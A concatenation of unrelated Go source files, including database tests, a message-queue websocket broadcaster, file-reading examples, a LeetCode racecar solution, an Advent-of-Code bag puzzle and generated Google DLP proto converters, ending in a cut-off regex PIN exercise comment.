			} else {
				if len(apps) > 0 {
					t.Errorf("Didn't expect applications, got: %+v", apps)
				}
			}
		})
	}
}
// TestDatabase_AddTag table-tests AddTag and GetTags against a freshly
// created fixture club, covering an invalid tag, an invalid club ID, and
// the happy path.
func TestDatabase_AddTag(t *testing.T) {
	type args struct {
		clubID string
		tag    *models.Tag
	}
	// errs records, per operation, whether an error is expected.
	type errs struct {
		addTag  bool
		getTags bool
	}
	tests := []struct {
		name    string
		args    args
		err     errs
		wantTag bool
	}{
		{"invalid tag", args{
			"1234",
			&models.Tag{},
		}, errs{true, true}, false},
		{"invalid club id", args{
			"",
			&models.Tag{
				Period:  "Winter 2019",
				TagName: "Designer",
			},
		}, errs{true, true}, false},
		{"valid everything", args{
			"1234",
			&models.Tag{
				Period:  "Winter 2019",
				TagName: "Designer",
			},
		}, errs{false, false}, true},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// Fresh DB per case; club and tag are cleaned up via defers.
			db, _ := newTestDB(t)
			defer db.DeleteClub(club.ClubID)
			db.AddNewClub(club, user)
			defer db.DeleteTag(tt.args.clubID, tt.args.tag.Period, tt.args.tag.TagName)
			if err := db.AddTag(tt.args.clubID, tt.args.tag); (err != nil) != tt.err.addTag {
				t.Errorf("Database.AddTag() error = %v, wantErr %v", err, tt.err.addTag)
			}
			tags, err := db.GetTags(tt.args.clubID, tt.args.tag.Period)
			if (err != nil) != tt.err.getTags {
				t.Errorf("Database.GetTags() error = %v, wantErr %v", err, tt.err.getTags)
				return
			}
			// Listing for the period must contain exactly the one tag.
			if tt.wantTag {
				expected := []*models.Tag{tt.args.tag}
				if !reflect.DeepEqual(expected, tags) {
					t.Errorf("Failed to get expect tags, expected: %+v, actual: %+v", expected, tags)
					return
				}
			} else {
				if len(tags) > 0 {
					t.Errorf("Didn't expect tags, got: %+v", tags)
				}
			}
		})
	}
}
|
package command
import (
"fmt"
"data-importer/mq/dataworker"
)
// SubScribeTaskInfo starts a background goroutine that consumes task
// messages from the message queue and fans each message body out to every
// registered websocket client whose clientType is TASKMESSAGE.
// NOTE(review): the name looks like a typo for SubscribeTaskInfo, but it is
// exported and cannot be renamed without breaking callers. The goroutine
// also reads hub.clients without visible synchronization — confirm the hub
// guarantees exclusive access during iteration.
func (c *APICommand) SubScribeTaskInfo(hub *Hub) {
	go func() {
		// On consume failure the goroutine exits silently; no retry.
		msgs, err := c.MsgQueue.ConsumeMessage(dataworker.TASKMESSAGE)
		if err != nil {
			return
		}
		// Loop ends when the delivery channel is closed by the queue.
		for d := range msgs {
			fmt.Println("Receive msg, time:", d.Timestamp, "body: ", string(d.Body))
			for k, v := range hub.clients {
				if v && k.clientType == dataworker.TASKMESSAGE {
					fmt.Println("Send websocket, time:", d.Timestamp, "body: ", string(d.Body))
					k.writeTaskInfo(d.Body)
				}
			}
		}
	}()
}
|
package main
import (
"bufio"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"strings"
)
// readFromConsole echoes lines typed on stdin until the user enters "end"
// or input is exhausted.
func readFromConsole() {
	reader := bufio.NewReader(os.Stdin)
	for {
		val, err := reader.ReadString('\n')
		if strings.Trim(val, "\n") == "end" {
			break
		}
		if len(val) > 0 {
			fmt.Println(val)
		}
		// BUG FIX: the original printed the error and kept looping, so on
		// EOF (e.g. Ctrl-D or a closed pipe) it spun forever printing "EOF".
		if err != nil {
			if err != io.EOF {
				fmt.Println(err)
			}
			break
		}
	}
}
// readFileByLine prints ./car.json line by line.
func readFileByLine() {
	file, err := os.Open("./car.json")
	if err != nil {
		fmt.Println(err)
		return
	}
	defer file.Close()
	reader := bufio.NewReader(file)
	for {
		val, err := reader.ReadString('\n')
		// BUG FIX: print any data returned alongside the error — the
		// original dropped the final line when the file had no trailing
		// newline.
		if len(val) > 0 {
			fmt.Println(val)
		}
		if err != nil {
			// BUG FIX: a non-EOF error previously looped forever; now any
			// error ends the loop and unexpected ones are reported.
			if err != io.EOF {
				fmt.Println(err)
			}
			break
		}
	}
}
// readFileContent slurps ./car.json into memory in one call and prints it.
func readFileContent() {
	data, err := ioutil.ReadFile("./car.json")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println(string(data))
}
// readFileWithBuffer reads up to 2048 bytes of ./input.go through a
// buffered reader and prints exactly the bytes read.
func readFileWithBuffer() {
	file, err := os.Open("./input.go")
	if err != nil {
		fmt.Println(err)
		return
	}
	// BUG FIX: Close is deferred only after a successful Open; the original
	// deferred it before the error check, invoking Close on a nil *os.File.
	defer file.Close()
	buffer := make([]byte, 2048)
	reader := bufio.NewReader(file)
	n, err := reader.Read(buffer)
	if err != nil && err != io.EOF {
		fmt.Println(err)
		return
	}
	// BUG FIX: print only the n bytes actually read; the original printed
	// the whole 2048-byte buffer including trailing NUL padding.
	fmt.Println(string(buffer[:n]))
}
// readFileFromZip prints test.go.gz line by line, falling back to reading
// the raw file when it is not valid gzip data.
func readFileFromZip() {
	var r *bufio.Reader
	file, err := os.Open("test.go.gz")
	if err != nil {
		fmt.Println(err)
		return
	}
	defer file.Close()
	zr, err := gzip.NewReader(file)
	if err != nil {
		// Not gzip data: read the raw file instead.
		// NOTE(review): gzip.NewReader may already have consumed header
		// bytes from file before failing — confirm this fallback is
		// acceptable (the original had the same behavior).
		r = bufio.NewReader(file)
	} else {
		// BUG FIX: the gzip reader must be closed to release its resources
		// and verify the stream checksum; the original leaked it.
		defer zr.Close()
		r = bufio.NewReader(zr)
	}
	for {
		value, err := r.ReadString('\n')
		// BUG FIX: print trailing data returned with the error so a final
		// unterminated line is not dropped.
		if len(value) > 0 {
			fmt.Println(value)
		}
		if err != nil {
			// BUG FIX: non-EOF errors previously looped forever.
			if err != io.EOF {
				fmt.Println(err)
			}
			return
		}
	}
}
//
//func main() {
// //readFromConsole()
// // readFileByLine()
// // readFileContent()
// // readFileWithBuffer()
// readFileFromZip()
//}
|
package script
// Value is a script value: it exposes its Type via T() and, through the
// embedded AnyValue, can be re-resolved against a context.
type Value interface {
	T() Type
	AnyValue
}
// AnyValue is anything that can produce a concrete Value from a context.
type AnyValue interface {
	ValueFromCtx(AnyCtx) Value
}
// Values is a list of script values.
type Values []Value
// Runtime returns the underlying runtime value of each element, obtained
// via value.T().Get(), in order.
func (values Values) Runtime() (result []interface{}) {
	for i := range values {
		result = append(result, values[i].T().Get())
	}
	return result
}
|
package main
import (
"fmt"
"math"
)
// 818. 赛车
// 你的赛车起始停留在位置 0,速度为 +1,正行驶在一个无限长的数轴上。(车也可以向负数方向行驶。)
// 你的车会根据一系列由 A(加速)和 R(倒车)组成的指令进行自动驾驶 。
// 当车得到指令 "A" 时, 将会做出以下操作: position += speed, speed *= 2。
// 当车得到指令 "R" 时, 将会做出以下操作:如果当前速度是正数,则将车速调整为 speed = -1 ;否则将车速调整为 speed = 1。 (当前所处位置不变。)
// 例如,当得到一系列指令 "AAR" 后, 你的车将会走过位置 0->1->3->3,并且速度变化为 1->2->4->-1。
// 现在给定一个目标位置,请给出能够到达目标位置的最短指令列表的长度。
// 说明:
// 1 <= target(目标位置) <= 10000。
// https://leetcode-cn.com/problems/race-car/
// main demonstrates racecar on two sample targets (expected output: 2, 5).
func main() {
	for _, target := range []int{3, 6} {
		fmt.Println(racecar(target))
	}
}
// Memo table for racecar: dp[i] holds the shortest instruction length that
// stops the car exactly at position i; 0 means "not computed yet".
// Targets are bounded by the problem statement: 1 <= target <= 10000.
var dp [10001]int

// racecar returns the length of the shortest sequence of A (accelerate:
// position += speed, speed *= 2) and R (reverse: speed becomes -1 or +1)
// instructions that stops the car exactly at target (LeetCode 818).
//
// Let k be the smallest exponent with target < 2^k. Either:
//   - target == 2^k - 1: k straight accelerations are optimal;
//   - overshoot: k accelerations past target, one R, then solve the
//     remaining distance (2^k - 1 - target) recursively;
//   - undershoot: k-1 accelerations to 2^(k-1) - 1, R, back up m steps
//     (0 <= m < k-1), R again, and solve the remainder recursively.
func racecar(target int) int {
	if v := dp[target]; v > 0 {
		return v
	}
	k := int(math.Floor(math.Log2(float64(target)))) + 1
	if target+1 == 1<<k {
		// Exactly 2^k - 1: all-A is provably shortest.
		return k
	}
	// Overshoot branch: k A's, one R, then the leftover distance.
	best := k + 1 + racecar((1<<k)-1-target)
	// Undershoot branches: (k-1) A's, R, m A's backwards, R, then recurse.
	for m := 0; m < k-1; m++ {
		rest := target - (1 << (k - 1)) + (1 << m)
		best = getMin(best, k+m+1+racecar(rest))
	}
	dp[target] = best
	return best
}

// getMin returns the smaller of a and b.
func getMin(a, b int) int {
	if a < b {
		return a
	}
	return b
}
|
package main
import (
"bufio"
"fmt"
"os"
"day3/bag"
)
// getInput reads path line by line, parsing each line into a bag.Bag.
// On failure it reports the error and returns whatever was collected
// (nil when the file cannot be opened).
func getInput(path string) []bag.Bag {
	file, err := os.Open(path)
	if err != nil {
		// BUG FIX: the original discarded this error and silently returned
		// an empty result for a missing/unreadable file.
		fmt.Println("opening input:", err)
		return nil
	}
	defer file.Close()
	var bags []bag.Bag
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		bags = append(bags, bag.NewBag(scanner.Text()))
	}
	// Surface scan errors (the original never checked scanner.Err).
	if err := scanner.Err(); err != nil {
		fmt.Println("reading input:", err)
	}
	return bags
}
// assignGroups partitions bags into groups of three, in input order.
// A trailing partial group (fewer than three bags) is skipped.
func assignGroups(input []bag.Bag) []bag.Group {
	groups := []bag.Group{}
	// BUG FIX: the loop condition requires a full triple (i+2 in range);
	// the original indexed input[i+1]/input[i+2] unconditionally and
	// panicked when len(input) was not a multiple of 3.
	for i := 0; i+2 < len(input); i += 3 {
		groups = append(groups, bag.NewGroup(input[i], input[i+1], input[i+2]))
	}
	return groups
}
// sumAllSingleBagRepeatItemPriorities totals the priority of the repeated
// item within each individual bag.
func sumAllSingleBagRepeatItemPriorities(bags []bag.Bag) int {
	sum := 0
	// The loop variable is named b: the original named it "bag", shadowing
	// the imported bag package inside the loop body.
	for _, b := range bags {
		sum += b.GetSingleBagRepeatedRunePriority()
	}
	return sum
}
// sumAllGroupRepeatItemPriorities totals the priority of the item shared
// by all three bags of each group.
func sumAllGroupRepeatItemPriorities(groups []bag.Group) int {
	total := 0
	for i := range groups {
		total += groups[i].GetGroupRepeatedRunePriority()
	}
	return total
}
// main solves both parts of the day-3 puzzle over data/data.txt and prints
// the two sums.
func main() {
	allBags := getInput("data/data.txt")
	fmt.Printf("1. Sum of all repeated item priorities: %d\n", sumAllSingleBagRepeatItemPriorities(allBags))
	allGroups := assignGroups(allBags)
	fmt.Printf("2. Sum of all group repeated item priorities: %d\n", sumAllGroupRepeatItemPriorities(allGroups))
}
|
// Copyright 2023 Google LLC. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"context"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/dcl"
alphapb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/dlp/alpha/dlp_alpha_go_proto"
emptypb "github.com/GoogleCloudPlatform/declarative-resource-client-library/python/proto/empty_go_proto"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/dlp/alpha"
)
// StoredInfoTypeServer implements the gRPC interface for StoredInfoType.
// The empty struct carries no state of its own.
type StoredInfoTypeServer struct{}
// ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionary converts a
// StoredInfoTypeLargeCustomDictionary object from its proto representation;
// a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionary(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionary) *alpha.StoredInfoTypeLargeCustomDictionary {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeLargeCustomDictionary{
		OutputPath:          ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath(p.GetOutputPath()),
		CloudStorageFileSet: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet(p.GetCloudStorageFileSet()),
		BigQueryField:       ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField(p.GetBigQueryField()),
	}
}
// ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath converts a
// StoredInfoTypeLargeCustomDictionaryOutputPath object from its proto
// representation; a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath) *alpha.StoredInfoTypeLargeCustomDictionaryOutputPath {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeLargeCustomDictionaryOutputPath{Path: dcl.StringOrNil(p.GetPath())}
}
// ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet
// converts a StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet object
// from its proto representation; a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet) *alpha.StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet{Url: dcl.StringOrNil(p.GetUrl())}
}
// ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField converts
// a StoredInfoTypeLargeCustomDictionaryBigQueryField object from its proto
// representation; a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField) *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryField {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeLargeCustomDictionaryBigQueryField{
		Table: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable(p.GetTable()),
		Field: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField(p.GetField()),
	}
}
// ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable
// converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable object
// from its proto representation; a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable) *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable{
		ProjectId: dcl.StringOrNil(p.GetProjectId()),
		DatasetId: dcl.StringOrNil(p.GetDatasetId()),
		TableId:   dcl.StringOrNil(p.GetTableId()),
	}
}
// ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField
// converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldField object
// from its proto representation; a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField(p *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField) *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldField {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldField{Name: dcl.StringOrNil(p.GetName())}
}
// ProtoToDlpAlphaStoredInfoTypeDictionary converts a
// StoredInfoTypeDictionary object from its proto representation; a nil
// input yields nil.
func ProtoToDlpAlphaStoredInfoTypeDictionary(p *alphapb.DlpAlphaStoredInfoTypeDictionary) *alpha.StoredInfoTypeDictionary {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeDictionary{
		WordList:         ProtoToDlpAlphaStoredInfoTypeDictionaryWordList(p.GetWordList()),
		CloudStoragePath: ProtoToDlpAlphaStoredInfoTypeDictionaryCloudStoragePath(p.GetCloudStoragePath()),
	}
}
// ProtoToDlpAlphaStoredInfoTypeDictionaryWordList converts a
// StoredInfoTypeDictionaryWordList object from its proto representation;
// a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeDictionaryWordList(p *alphapb.DlpAlphaStoredInfoTypeDictionaryWordList) *alpha.StoredInfoTypeDictionaryWordList {
	if p == nil {
		return nil
	}
	obj := &alpha.StoredInfoTypeDictionaryWordList{}
	obj.Words = append(obj.Words, p.GetWords()...)
	return obj
}
// ProtoToDlpAlphaStoredInfoTypeDictionaryCloudStoragePath converts a
// StoredInfoTypeDictionaryCloudStoragePath object from its proto
// representation; a nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeDictionaryCloudStoragePath(p *alphapb.DlpAlphaStoredInfoTypeDictionaryCloudStoragePath) *alpha.StoredInfoTypeDictionaryCloudStoragePath {
	if p == nil {
		return nil
	}
	return &alpha.StoredInfoTypeDictionaryCloudStoragePath{Path: dcl.StringOrNil(p.GetPath())}
}
// ProtoToDlpAlphaStoredInfoTypeRegex converts a StoredInfoTypeRegex object
// from its proto representation, including its repeated group indexes; a
// nil input yields nil.
func ProtoToDlpAlphaStoredInfoTypeRegex(p *alphapb.DlpAlphaStoredInfoTypeRegex) *alpha.StoredInfoTypeRegex {
	if p == nil {
		return nil
	}
	obj := &alpha.StoredInfoTypeRegex{Pattern: dcl.StringOrNil(p.GetPattern())}
	obj.GroupIndexes = append(obj.GroupIndexes, p.GetGroupIndexes()...)
	return obj
}
// ProtoToStoredInfoType converts a StoredInfoType resource from its proto
// representation.
func ProtoToStoredInfoType(p *alphapb.DlpAlphaStoredInfoType) *alpha.StoredInfoType {
	return &alpha.StoredInfoType{
		Name:                  dcl.StringOrNil(p.GetName()),
		DisplayName:           dcl.StringOrNil(p.GetDisplayName()),
		Description:           dcl.StringOrNil(p.GetDescription()),
		LargeCustomDictionary: ProtoToDlpAlphaStoredInfoTypeLargeCustomDictionary(p.GetLargeCustomDictionary()),
		Dictionary:            ProtoToDlpAlphaStoredInfoTypeDictionary(p.GetDictionary()),
		Regex:                 ProtoToDlpAlphaStoredInfoTypeRegex(p.GetRegex()),
		Parent:                dcl.StringOrNil(p.GetParent()),
		Location:              dcl.StringOrNil(p.GetLocation()),
	}
}
// DlpAlphaStoredInfoTypeLargeCustomDictionaryToProto converts a
// StoredInfoTypeLargeCustomDictionary object to its proto representation;
// a nil input yields nil.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryToProto(o *alpha.StoredInfoTypeLargeCustomDictionary) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionary {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionary{}
	out.SetOutputPath(DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPathToProto(o.OutputPath))
	out.SetCloudStorageFileSet(DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSetToProto(o.CloudStorageFileSet))
	out.SetBigQueryField(DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldToProto(o.BigQueryField))
	return out
}
// DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPathToProto converts a
// StoredInfoTypeLargeCustomDictionaryOutputPath object to its proto
// representation; a nil input yields nil.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPathToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryOutputPath) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryOutputPath{}
	out.SetPath(dcl.ValueOrEmptyString(o.Path))
	return out
}
// DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSetToProto
// converts a StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet object
// to its proto representation; a nil input yields nil.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSetToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryCloudStorageFileSet) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryCloudStorageFileSet{}
	out.SetUrl(dcl.ValueOrEmptyString(o.Url))
	return out
}
// DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldToProto converts
// a StoredInfoTypeLargeCustomDictionaryBigQueryField object to its proto
// representation; a nil input yields nil.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryField) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryField{}
	out.SetTable(DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTableToProto(o.Table))
	out.SetField(DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldFieldToProto(o.Field))
	return out
}
// DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTableToProto
// converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable object
// to its proto representation; a nil input yields nil.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTableToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldTable) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldTable{}
	out.SetProjectId(dcl.ValueOrEmptyString(o.ProjectId))
	out.SetDatasetId(dcl.ValueOrEmptyString(o.DatasetId))
	out.SetTableId(dcl.ValueOrEmptyString(o.TableId))
	return out
}
// DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldFieldToProto
// converts a StoredInfoTypeLargeCustomDictionaryBigQueryFieldField object
// to its proto representation; a nil input yields nil.
func DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldFieldToProto(o *alpha.StoredInfoTypeLargeCustomDictionaryBigQueryFieldField) *alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeLargeCustomDictionaryBigQueryFieldField{}
	out.SetName(dcl.ValueOrEmptyString(o.Name))
	return out
}
// DlpAlphaStoredInfoTypeDictionaryToProto converts a
// StoredInfoTypeDictionary object to its proto representation; a nil input
// yields nil.
func DlpAlphaStoredInfoTypeDictionaryToProto(o *alpha.StoredInfoTypeDictionary) *alphapb.DlpAlphaStoredInfoTypeDictionary {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeDictionary{}
	out.SetWordList(DlpAlphaStoredInfoTypeDictionaryWordListToProto(o.WordList))
	out.SetCloudStoragePath(DlpAlphaStoredInfoTypeDictionaryCloudStoragePathToProto(o.CloudStoragePath))
	return out
}
// DlpAlphaStoredInfoTypeDictionaryWordListToProto converts a
// StoredInfoTypeDictionaryWordList object to its proto representation; a
// nil input yields nil. The word slice is copied before being stored.
func DlpAlphaStoredInfoTypeDictionaryWordListToProto(o *alpha.StoredInfoTypeDictionaryWordList) *alphapb.DlpAlphaStoredInfoTypeDictionaryWordList {
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeDictionaryWordList{}
	words := make([]string, len(o.Words))
	copy(words, o.Words)
	out.SetWords(words)
	return out
}
// StoredInfoTypeDictionaryCloudStoragePathToProto converts a StoredInfoTypeDictionaryCloudStoragePath object to its proto representation.
func DlpAlphaStoredInfoTypeDictionaryCloudStoragePathToProto(o *alpha.StoredInfoTypeDictionaryCloudStoragePath) *alphapb.DlpAlphaStoredInfoTypeDictionaryCloudStoragePath {
	// A nil DCL object maps to a nil proto.
	if o == nil {
		return nil
	}
	out := &alphapb.DlpAlphaStoredInfoTypeDictionaryCloudStoragePath{}
	out.SetPath(dcl.ValueOrEmptyString(o.Path))
	return out
}
// StoredInfoTypeRegexToProto converts a StoredInfoTypeRegex object to its proto representation.
func DlpAlphaStoredInfoTypeRegexToProto(o *alpha.StoredInfoTypeRegex) *alphapb.DlpAlphaStoredInfoTypeRegex {
	if o == nil {
		return nil
	}
	p := &alphapb.DlpAlphaStoredInfoTypeRegex{}
	p.SetPattern(dcl.ValueOrEmptyString(o.Pattern))
	// Both sides are []int64; the builtin copy replaces the previous
	// element-by-element assignment loop.
	sGroupIndexes := make([]int64, len(o.GroupIndexes))
	copy(sGroupIndexes, o.GroupIndexes)
	p.SetGroupIndexes(sGroupIndexes)
	return p
}
// StoredInfoTypeToProto converts a StoredInfoType resource to its proto representation.
func StoredInfoTypeToProto(resource *alpha.StoredInfoType) *alphapb.DlpAlphaStoredInfoType {
	out := &alphapb.DlpAlphaStoredInfoType{}
	// Scalar fields.
	out.SetName(dcl.ValueOrEmptyString(resource.Name))
	out.SetDisplayName(dcl.ValueOrEmptyString(resource.DisplayName))
	out.SetDescription(dcl.ValueOrEmptyString(resource.Description))
	out.SetParent(dcl.ValueOrEmptyString(resource.Parent))
	out.SetLocation(dcl.ValueOrEmptyString(resource.Location))
	// Nested messages (each converter tolerates nil input).
	out.SetLargeCustomDictionary(DlpAlphaStoredInfoTypeLargeCustomDictionaryToProto(resource.LargeCustomDictionary))
	out.SetDictionary(DlpAlphaStoredInfoTypeDictionaryToProto(resource.Dictionary))
	out.SetRegex(DlpAlphaStoredInfoTypeRegexToProto(resource.Regex))
	return out
}
// applyStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoType Apply() method.
func (s *StoredInfoTypeServer) applyStoredInfoType(ctx context.Context, c *alpha.Client, request *alphapb.ApplyDlpAlphaStoredInfoTypeRequest) (*alphapb.DlpAlphaStoredInfoType, error) {
	res, err := c.ApplyStoredInfoType(ctx, ProtoToStoredInfoType(request.GetResource()))
	if err != nil {
		return nil, err
	}
	return StoredInfoTypeToProto(res), nil
}
// ApplyDlpAlphaStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoType Apply() method.
func (s *StoredInfoTypeServer) ApplyDlpAlphaStoredInfoType(ctx context.Context, request *alphapb.ApplyDlpAlphaStoredInfoTypeRequest) (*alphapb.DlpAlphaStoredInfoType, error) {
	cl, err := createConfigStoredInfoType(ctx, request.GetServiceAccountFile())
	if err != nil {
		return nil, err
	}
	return s.applyStoredInfoType(ctx, cl, request)
}
// DeleteDlpAlphaStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoType Delete() method.
func (s *StoredInfoTypeServer) DeleteDlpAlphaStoredInfoType(ctx context.Context, request *alphapb.DeleteDlpAlphaStoredInfoTypeRequest) (*emptypb.Empty, error) {
	cl, err := createConfigStoredInfoType(ctx, request.GetServiceAccountFile())
	if err != nil {
		return nil, err
	}
	// An Empty message is returned regardless; the delete error, if any,
	// travels alongside it.
	res := ProtoToStoredInfoType(request.GetResource())
	err = cl.DeleteStoredInfoType(ctx, res)
	return &emptypb.Empty{}, err
}
// ListDlpAlphaStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoTypeList() method.
func (s *StoredInfoTypeServer) ListDlpAlphaStoredInfoType(ctx context.Context, request *alphapb.ListDlpAlphaStoredInfoTypeRequest) (*alphapb.ListDlpAlphaStoredInfoTypeResponse, error) {
	cl, err := createConfigStoredInfoType(ctx, request.GetServiceAccountFile())
	if err != nil {
		return nil, err
	}
	resources, err := cl.ListStoredInfoType(ctx, request.GetLocation(), request.GetParent())
	if err != nil {
		return nil, err
	}
	// Pre-size the output slice: the final length is known up front, which
	// avoids repeated growth copies during append.
	protos := make([]*alphapb.DlpAlphaStoredInfoType, 0, len(resources.Items))
	for _, r := range resources.Items {
		protos = append(protos, StoredInfoTypeToProto(r))
	}
	p := &alphapb.ListDlpAlphaStoredInfoTypeResponse{}
	p.SetItems(protos)
	return p, nil
}
// createConfigStoredInfoType builds a DCL client authenticated with the
// given service-account credentials file. The ctx parameter is currently
// unused but kept so the signature matches the other createConfig helpers.
func createConfigStoredInfoType(ctx context.Context, serviceAccountFile string) (*alpha.Client, error) {
	// Renamed from service_account_file: Go identifiers use camelCase,
	// not underscores.
	conf := dcl.NewConfig(dcl.WithUserAgent("dcl-test"), dcl.WithCredentialsFile(serviceAccountFile))
	return alpha.NewClient(conf), nil
}
|
package repository
import "errors"
var (
	// ErrDateBusy reports that the requested time slot is already occupied by another event.
	ErrDateBusy = errors.New("time is already taken by another event")
	// ErrEventNotFound reports that the requested event does not exist in storage.
	ErrEventNotFound = errors.New("event not found")
	// ErrStorageUnavailable reports that the backing storage cannot be reached.
	ErrStorageUnavailable = errors.New("storage unavailable")
	// ErrInvalidData reports that the supplied input data failed validation.
	ErrInvalidData = errors.New("invalid input data")
	// ErrGetQueryResult reports that a result could not be obtained for a query.
	ErrGetQueryResult = errors.New("can not get result for query")
)
|
package main
import (
"github.com/WIZARDISHUNGRY/golinters/pkg/analyzer"
"golang.org/x/tools/go/analysis/singlechecker"
)
// main runs the InterfaceMustBePtr analyzer as a standalone
// single-analyzer linter binary.
func main() {
	singlechecker.Main(analyzer.InterfaceMustBePtr)
}
|
/*
Create a RegExp myRegExp to test if a string is a valid pin or not.
A valid pin has:
Exactly 4 or 6 characters.
Only numerical characters (0-9).
No whitespace.
Examples
myRegExp.test("1234") ➞ true
myRegExp.test("45135") ➞ false
myRegExp.test("89abc1") ➞ false
myRegExp.test("900876") ➞ true
myRegExp.test(" 4983") ➞ false
Notes
